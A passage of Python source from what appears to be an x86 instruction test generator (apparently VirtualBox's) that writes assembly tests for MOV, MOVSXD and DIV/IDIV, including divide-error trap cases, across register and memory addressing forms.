assert offDisp is None or iMod != 0;
if (iOp2 != 5 and iOp2 != 13) or iMod != 0:
oGen.write(' call VBINSTST_NAME(%s)\n'
% (oGen.needGRegMemSetup(cAddrBits, cbEffOp, iOp2, offDisp),));
else:
oGen.write(' call VBINSTST_NAME(Common_SetupMemReadU%u)\n' % (cbEffOp*8,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
return True;
## @}
def generateOneStdTestGregGreg(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult):
""" Generate one standard instr greg,greg test. """
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uInput,));
if iOp1X != iOp2X:
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
self.writeInstrGregGreg(cbEffOp, iOp1, iOp2, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1X, iOp2X if iOp1X != iOp2X else None),));
_ = cbMaxOp;
return True;
def generateOneStdTestGregGreg8BitHighPain(self, oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput):
""" High 8-bit registers are a real pain! """
assert oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) or oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2);
# Figure out the register indexes of the max op sized regs involved.
iOp1X = iOp1 & 3;
iOp2X = iOp2 & 3;
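# Without a REX prefix, encodings 4-7 of the 8-bit register table are AH/CH/DH/BH,
# which live in bits 8-15 of rAX/rCX/rDX/rBX (indexes 0-3); hence the '& 3' above.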
oGen.write(' ; iOp1=%u iOp1X=%u iOp2=%u iOp2X=%u\n' % (iOp1, iOp1X, iOp2, iOp2X,));
# Calculate unshifted result.
if iOp1X != iOp2X:
uCur = oGen.auRegValues[iOp1X];
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = uInput;
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) != oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uCur = rotateRightUxx(cbMaxOp * 8, uCur, 8);
else:
uCur = rotateLeftUxx(cbMaxOp * 8, uCur, 8);
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
# Rotate the input and/or result to match their max-op-sized registers.
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uInput = rotateLeftUxx(cbMaxOp * 8, uInput, 8);
if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1):
uResult = rotateLeftUxx(cbMaxOp * 8, uResult, 8);
# Hand it over to an overridable worker method.
return self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1X, iOp2, iOp2X, uInput, uResult);
def generateOneStdTestGregMemNoSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iOp2, uInput, uResult):
""" Generate mode 0, 1 and 2 test for the R/M=iOp2. """
if cAddrBits == 16:
_ = cbMaxOp;
else:
iMod = 0; # No disp, except for i=5.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, None, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
if iOp2 != 5 and iOp2 != 13:
iMod = 1;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
iMod = 2;
for offDisp in oGen.getDispForMod(iMod):
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupPureRM(oGen, cAddrBits, cbEffOp, iOp2, iMod, uInput, offDisp);
self.writeInstrGregPureRM(cbEffOp, iOp1, cAddrBits, iOp2, iMod, offDisp, oGen);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(iOp1, iOp2),));
return True;
def generateOneStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod, # pylint: disable=R0913
iBaseReg, iIndexReg, iScale, uInput, uResult):
""" Generate one SIB variations. """
for offDisp in oGen.getDispForMod(iMod, cbEffOp):
if ((iBaseReg == 5 or iBaseReg == 13) and iMod == 0):
if iIndexReg == 4:
if cAddrBits == 64:
continue; # skipping.
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByLabel(oGen, cbEffOp, uInput);
self.writeInstrGregSibLabel(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
self.generateMemSetupReadByScaledReg(oGen, cAddrBits, cbEffOp, iIndexReg, iScale, uInput, offDisp);
self.writeInstrGregSibScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iIndexReg);
else:
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
if iIndexReg == 4:
self.generateMemSetupReadByReg(oGen, cAddrBits, cbEffOp, iBaseReg, uInput, offDisp);
self.writeInstrGregSibBase(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg);
else:
if iIndexReg == iBaseReg and iScale == 1 and offDisp is not None and (offDisp & 1):
if offDisp < 0: offDisp += 1;
else: offDisp -= 1;
self.generateMemSetupReadByBaseAndScaledReg(oGen, cAddrBits, cbEffOp, iBaseReg,
iIndexReg, iScale, uInput, offDisp);
self.writeInstrGregSibBaseAndScaledReg(cbEffOp, iOp1, cAddrBits, iBaseReg, iIndexReg, iScale, offDisp, oGen);
sChecker = oGen.needGRegChecker(iOp1, iBaseReg, iIndexReg);
oGen.pushConst(uResult);
oGen.write(' call VBINSTST_NAME(%s)\n' % (sChecker,));
_ = cbMaxOp;
return True;
def generateStdTestGregMemSib(self, oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, auInputs):
""" Generate all SIB variations for the given iOp1 (reg) value. """
assert cAddrBits in [32, 64];
i = oGen.cSibBasePerRun;
while i > 0:
oGen.iSibBaseReg = (oGen.iSibBaseReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibBaseReg == X86_GREG_xSP: # no RSP testing atm.
continue;
j = oGen.getSibIndexPerRun();
while j > 0:
oGen.iSibIndexReg = (oGen.iSibIndexReg + 1) % oGen.oTarget.getGRegCount(cAddrBits / 8);
if oGen.iSibIndexReg == iOp1 and oGen.iSibIndexReg != 4 and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for iMod in [0, 1, 2]:
if oGen.iSibBaseReg == iOp1 \
and ((oGen.iSibBaseReg != 5 and oGen.iSibBaseReg != 13) or iMod != 0) \
and cAddrBits != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
for _ in oGen.oSibScaleRange:
oGen.iSibScale *= 2;
if oGen.iSibScale > 8:
oGen.iSibScale = 1;
for uInput in auInputs:
oGen.newSubTest();
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[iOp1], oGen);
self.generateOneStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, iOp1, iMod,
oGen.iSibBaseReg, oGen.iSibIndexReg, oGen.iSibScale,
uInput, uResult);
j -= 1;
i -= 1;
return True;
def generateStandardTests(self, oGen):
""" Generate standard tests. """
# Parameters.
cbDefOp = oGen.oTarget.getDefOpBytes();
cbMaxOp = oGen.oTarget.getMaxOpBytes();
auShortInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen);
auLongInputs = self.generateInputs(cbDefOp, cbMaxOp, oGen, fLong = True);
iLongOp1 = oGen.oTarget.randGRegNoSp();
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if self.fTestRegForm:
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
for iOp1 in range(oGen.oTarget.getGRegCount(cbEffOp)):
if iOp1 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
for iOp2 in oOp2Range:
if (iOp2 >= 16 and iOp1 in range(4, 16)) \
or (iOp1 >= 16 and iOp2 in range(4, 16)):
continue; # Any REX encoding turns AH,CH,DH,BH regs into SPL,BPL,SIL,DIL.
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
oGen.write('; iOp2=%u cbEffOp=%u\n' % (iOp2, cbEffOp));
for uInput in (auLongInputs if iOp1 == iLongOp1 and iOp2 == iLongOp2 else auShortInputs):
oGen.newSubTest();
if not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp1) and not oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2):
uCur = oGen.auRegValues[iOp1 & 15] if iOp1 != iOp2 else uInput;
uResult = self.fnCalcResult(cbEffOp, uInput, uCur, oGen);
self.generateOneStdTestGregGreg(oGen, cbEffOp, cbMaxOp, iOp1, iOp1 & 15, iOp2, iOp2 & 15,
uInput, uResult);
else:
self.generateOneStdTestGregGreg8BitHighPain(oGen, cbEffOp, cbMaxOp, iOp1, iOp2, uInput);
# Memory test.
if self.fTestMemForm:
for cAddrBits in oGen.oTarget.getAddrModes():
for cbEffOp in self.acbOpVars:
if cbEffOp > cbMaxOp:
continue;
for _ in oGen.getModRegRange(cbEffOp):
oGen.iModReg = (oGen.iModReg + 1) % oGen.oTarget.getGRegCount(cbEffOp);
if oGen.iModReg == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if oGen.iModReg > 15:
continue; ## @todo AH,CH,DH,BH
auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
for _ in oGen.oModRmRange:
oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
if oGen.iModRm != 4 or cAddrBits == 16:
for uInput in auInputs:
oGen.newSubTest();
if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 \
and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
continue; # Don't know the high bit of the address ending up the result - skip it for now.
uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
oGen.iModReg, oGen.iModRm, uInput, uResult);
else:
# SIB - currently only short list of inputs or things may get seriously out of hand.
self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
self.generateStandardTests(oGen);
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_Mov_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOV Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'mov Gv,Ev', self.calc_mov);
@staticmethod
def calc_mov(cbEffOp, uInput, uCur, oGen):
""" Calculates the result of a mov instruction."""
if cbEffOp == 8:
return uInput & UINT64_MAX;
if cbEffOp == 4:
return uInput & UINT32_MAX;
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & UINT16_MAX);
assert cbEffOp == 1; _ = oGen;
return (uCur & 0xffffffffffffff00) | (uInput & UINT8_MAX);
class InstrTest_MovSxD_Gv_Ev(InstrTest_MemOrGreg_2_Greg):
"""
Tests MOVSXD Gv,Ev.
"""
def __init__(self):
InstrTest_MemOrGreg_2_Greg.__init__(self, 'movsxd Gv,Ev', self.calc_movsxd, acbOpVars = [ 8, 4, 2, ]);
self.fTestMemForm = False; # drop this...
def writeInstrGregGreg(self, cbEffOp, iOp1, iOp2, oGen):
""" Writes the instruction with two general registers as operands. """
if cbEffOp == 8:
oGen.write(' movsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp / 2),));
else:
oGen.write(' oddmovsxd %s, %s\n'
% ( oGen.gregNameBytes(iOp1, cbEffOp), oGen.gregNameBytes(iOp2, cbEffOp),));
return True;
def isApplicable(self, oGen):
return oGen.oTarget.is64Bit();
@staticmethod
def calc_movsxd(cbEffOp, uInput, uCur, oGen):
"""
Calculates the result of a movsxd instruction.
Returns the result value (cbMaxOp sized).
"""
_ = oGen;
if cbEffOp == 8 and (uInput & RT_BIT_32(31)):
return (UINT32_MAX << 32) | (uInput & UINT32_MAX);
if cbEffOp == 2:
return (uCur & 0xffffffffffff0000) | (uInput & 0xffff);
return uInput & UINT32_MAX;
class InstrTest_DivIDiv(InstrTestBase):
"""
Tests IDIV and DIV instructions.
"""
def __init__(self, fIsIDiv):
if not fIsIDiv:
InstrTestBase.__init__(self, 'div Gv,Ev', 'div');
else:
InstrTestBase.__init__(self, 'idiv Gv,Ev', 'idiv');
self.fIsIDiv = fIsIDiv;
def generateInputEdgeCases(self, cbEffOp, fLong, fXcpt):
""" Generate edge case inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
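# A reading of the maths below: uStep is the first quotient that no longer fits in
# cbEffOp bits (halved for signed IDIV).  The dividends start at uStep*uDivisor - 1,
# i.e. quotient uStep - 1, and adding fXcpt (True == 1) bumps the quotient up to
# uStep so the same table doubles as a #DE-raising input set.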
# edge tests
auRet = [];
uDivisor = 1 if fLong else 3;
uDividend = uStep * uDivisor - 1;
for i in range(5 if fLong else 3):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
auRet.append([-(uDividend + uDivisor + fXcpt), uDivisor]);
auRet.append([ (uDividend + uDivisor + fXcpt), -uDivisor]);
if i <= 3 and fLong:
auRet.append([uDividend - 1 + fXcpt*3, uDivisor]);
if self.fIsIDiv:
auRet.append([-(uDividend - 1 + fXcpt*3), -uDivisor]);
uDivisor += 1;
uDividend += uStep;
uDivisor = uStep - 1;
uDividend = uStep * uDivisor - 1;
for _ in range(3 if fLong else 1):
auRet.append([uDividend + fXcpt, uDivisor]);
if self.fIsIDiv:
auRet.append([-uDividend - fXcpt, -uDivisor]);
uDivisor -= 1;
uDividend -= uStep;
if self.fIsIDiv:
uDivisor = -uStep;
for _ in range(3 if fLong else 1):
auRet.append([uDivisor * (-uStep - 1) - (not fXcpt), uDivisor]);
uDivisor += 1
uDivisor = uStep - 1;
for _ in range(3 if fLong else 1):
auRet.append([-(uDivisor * (uStep + 1) - (not fXcpt)), uDivisor]);
uDivisor -= 1
return auRet;
def generateInputsNoXcpt(self, cbEffOp, fLong = False):
""" Generate inputs for cbEffOp. Returns a list of pairs, dividen + divisor. """
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, False)
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep or uDivisor < -uStep:
continue;
uDividend = randSxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep or uResult <= -uStep: # exclude difficulties
continue;
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
if uDivisor == 0 or uDivisor >= uStep:
continue;
uDividend = randUxx(cbEffOp * 16);
uResult = uDividend / uDivisor;
if uResult >= uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneStdTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full width, unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
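# Example: Python floors, so -7 / 2 == -4 with remainder 1, while x86 [I]DIV
# truncates towards zero giving -3 and -1; the adjustment above converts the
# former into the latter.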
uAXResult = iQuotient & fEffOp;
uDXResult = iReminder & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
if cbEffOp < 4:
uAXResult |= uAX & fTopOp;
uDXResult |= uDX & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,
iQuotient & fEffOp, iQuotient, iReminder & fEffOp, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.pushConst(uDXResult);
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneStdTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test (8-bit). """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full width, unsigned
uOp2Val = iDivisor & UINT8_MAX;
iQuotient = iDividend / iDivisor;
iReminder = iDividend % iDivisor;
if iReminder != 0 and iQuotient < 0: # python has different rounding rules for negative division.
iQuotient += 1;
iReminder -= iDivisor;
uAXResult = (iQuotient & UINT8_MAX) | ((iReminder & UINT8_MAX) << 8);
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uAXResult |= uAX & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
' ; iQuotient=%#x (%d) iReminder=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,
iQuotient & UINT8_MAX, iQuotient, iReminder & UINT8_MAX, iReminder, ));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.pushConst(uAXResult);
oGen.write(' %-4s %s\n' % (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateStandardTests(self, oGen):
""" Generates test that causes no exceptions. """
# Parameters.
iLongOp2 = oGen.oTarget.randGRegNoSp();
# Register tests
if True:
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u\n' % (cbEffOp,));
oOp2Range = range(oGen.oTarget.getGRegCount(cbEffOp));
if oGen.oOptions.sTestSize == InstructionTestGen.ksTestSize_Tiny:
oOp2Range = [iLongOp2,];
for iOp2 in oOp2Range:
if iOp2 == X86_GREG_xSP:
continue; # Cannot test xSP atm.
if iOp2 == X86_GREG_xAX or (cbEffOp > 1 and iOp2 == X86_GREG_xDX):
continue; # Will overflow or be too complicated to get right.
if cbEffOp == 1 and iOp2 == (16 if oGen.oTarget.is64Bit() else 4):
continue; # Avoid dividing by AH, same reasons as above.
for iDividend, iDivisor in self.generateInputsNoXcpt(cbEffOp, iOp2 == iLongOp2):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneStdTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneStdTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
## Memory test.
#if False:
# for cAddrBits in oGen.oTarget.getAddrModes():
# for cbEffOp in self.acbOpVars:
# if cbEffOp > cbMaxOp:
# continue;
#
# auInputs = auLongInputs if oGen.iModReg == iLongOp1 else auShortInputs;
# for _ in oGen.oModRmRange:
# oGen.iModRm = (oGen.iModRm + 1) % oGen.oTarget.getGRegCount(cAddrBits * 8);
# if oGen.iModRm != 4 or cAddrBits == 16:
# for uInput in auInputs:
# oGen.newSubTest();
# if oGen.iModReg == oGen.iModRm and oGen.iModRm != 5 and oGen.iModRm != 13 and cbEffOp != cbMaxOp:
# continue; # Don't know the high bit of the address ending up the result - skip it for now.
# uResult = self.fnCalcResult(cbEffOp, uInput, oGen.auRegValues[oGen.iModReg & 15], oGen);
# self.generateOneStdTestGregMemNoSib(oGen, cAddrBits, cbEffOp, cbMaxOp,
# oGen.iModReg, oGen.iModRm, uInput, uResult);
# else:
# # SIB - currently only short list of inputs or things may get seriously out of hand.
# self.generateStdTestGregMemSib(oGen, cAddrBits, cbEffOp, cbMaxOp, oGen.iModReg, auShortInputs);
#
return True;
def generateInputsXcpt(self, cbEffOp, fLong = False):
"""
Generate inputs for cbEffOp that will overflow or underflow.
Returns a list of pairs, dividend + divisor.
"""
# Test params.
uStep = 1 << (cbEffOp * 8);
if self.fIsIDiv:
uStep /= 2;
# edge tests
auRet = self.generateInputEdgeCases(cbEffOp, fLong, True);
auRet.extend([[0, 0], [1, 0], [ uStep * uStep / 2 - 1, 0]]);
# random tests.
if self.fIsIDiv:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randSxx(cbEffOp * 8);
uDividend = randSxx(cbEffOp * 16);
if uDivisor >= uStep or uDivisor < -uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if (uResult <= uStep and uResult >= 0) or (uResult >= -uStep and uResult < 0):
continue; # exclude difficulties
break;
auRet.append([uDividend, uDivisor]);
else:
for _ in range(6 if fLong else 2):
while True:
uDivisor = randUxx(cbEffOp * 8);
uDividend = randUxx(cbEffOp * 16);
if uDivisor >= uStep:
continue;
if uDivisor != 0:
uResult = uDividend / uDivisor;
if uResult < uStep:
continue;
break;
auRet.append([uDividend, uDivisor]);
return auRet;
def generateOneDivideErrorTestGreg(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV rDX:rAX,<GREG>' test that causes #DE. """
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fEffOp = ((1 << (cbEffOp *8) ) - 1);
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
fTopOp = fMaxOp - fEffOp;
fFullOp1 = ((1 << (cbEffOp*16)) - 1);
uAX = iDividend & fFullOp1; # full width, unsigned
uDX = uAX >> (cbEffOp*8);
uAX &= fEffOp;
uOp2Val = iDivisor & fEffOp;
if cbEffOp < cbMaxOp:
uAX |= randUxx(cbMaxOp * 8) & fTopOp;
uDX |= randUxx(cbMaxOp * 8) & fTopOp;
uOp2Val |= randUxx(cbMaxOp * 8) & fTopOp;
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & fFullOp1, iDividend, iDivisor & fEffOp, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX], uDX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xDX],));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX],));
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, X86_GREG_xDX, iOp2),));
return True;
def generateOneDivideErrorTestGreg8Bit(self, oGen, cbEffOp, iOp2, iDividend, iDivisor):
""" Generate code of one '[I]DIV AX,<GREG>' test that causes #DE (8-bit). """
if not oGen.oTarget.is64Bit() and iOp2 == 4: # Avoid AH.
iOp2 = 5;
cbMaxOp = oGen.oTarget.getMaxOpBytes();
fMaxOp = UINT64_MAX if cbMaxOp == 8 else UINT32_MAX; assert cbMaxOp in [8, 4];
iOp2X = (iOp2 & 3) if oGen.oTarget.is8BitHighGReg(cbEffOp, iOp2) else iOp2;
assert iOp2X != X86_GREG_xAX;
uAX = iDividend & UINT16_MAX; # full width, unsigned
uOp2Val = iDivisor & UINT8_MAX;
uAX |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT16_MAX);
uOp2Val |= randUxx(cbMaxOp * 8) & (fMaxOp - UINT8_MAX);
if iOp2X != iOp2:
uOp2Val = rotateLeftUxx(cbMaxOp * 8, uOp2Val, 8);
oGen.write(' ; iDividend=%#x (%d) iDivisor=%#x (%d)\n'
% ( iDividend & UINT16_MAX, iDividend, iDivisor & UINT8_MAX, iDivisor,));
oGen.write(' call VBINSTST_NAME(Common_LoadKnownValues)\n');
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[X86_GREG_xAX], uAX,));
oGen.write(' mov %s, 0x%x\n' % (oGen.oTarget.asGRegs[iOp2X], uOp2Val,));
oGen.write(' push %s\n' % (oGen.oTarget.asGRegs[iOp2X],));
oGen.write(' push sAX\n');
oGen.write(' VBINSTST_TRAP_INSTR X86_XCPT_DE, 0, %-4s %s\n'
% (self.sInstr, oGen.gregNameBytes(iOp2, cbEffOp),));
oGen.write(' call VBINSTST_NAME(%s)\n' % (oGen.needGRegChecker(X86_GREG_xAX, iOp2X),));
return;
def generateDivideErrorTests(self, oGen):
""" Generate divide error tests (raises X86_XCPT_DE). """
oGen.write('%ifdef VBINSTST_CAN_DO_TRAPS\n');
# We do one register variation here, assuming the standard test has got them covered.
# Register tests
if True:
iOp2 = oGen.oTarget.randGRegNoSp();
while iOp2 == X86_GREG_xAX or iOp2 == X86_GREG_xDX:
iOp2 = oGen.oTarget.randGRegNoSp();
for cbEffOp in ( 8, 4, 2, 1 ):
if cbEffOp > oGen.oTarget.getMaxOpBytes():
continue;
oGen.write('; cbEffOp=%u iOp2=%u\n' % (cbEffOp, iOp2,));
for iDividend, iDivisor in self.generateInputsXcpt(cbEffOp, fLong = not oGen.isTiny()):
oGen.newSubTest();
if cbEffOp > 1:
self.generateOneDivideErrorTestGreg(oGen, cbEffOp, iOp2, iDividend, iDivisor);
else:
self.generateOneDivideErrorTestGreg8Bit(oGen, cbEffOp, iOp2, iDividend, iDivisor);
oGen.write('%endif ; VBINSTST_CAN_DO_TRAPS\n');
return True;
def generateTest(self, oGen, sTestFnName):
oGen.write('VBINSTST_BEGINPROC %s\n' % (sTestFnName,));
#oGen.write(' int3\n');
self.generateStandardTests(oGen);
self.generateDivideErrorTests(oGen);
#oGen.write(' int3\n');
oGen.write(' ret\n');
oGen.write('VBINSTST_ENDPROC %s\n' % (sTestFnName,));
return True;
class InstrTest_DaaDas(InstrTestBase):
""" Tests the DAA and DAS instructions. """
def __init__(self, fIsDas):
InstrTestBase.__init__(self, 'das' if fIsDas else 'daa');
self.fIsDas = fIsDas;
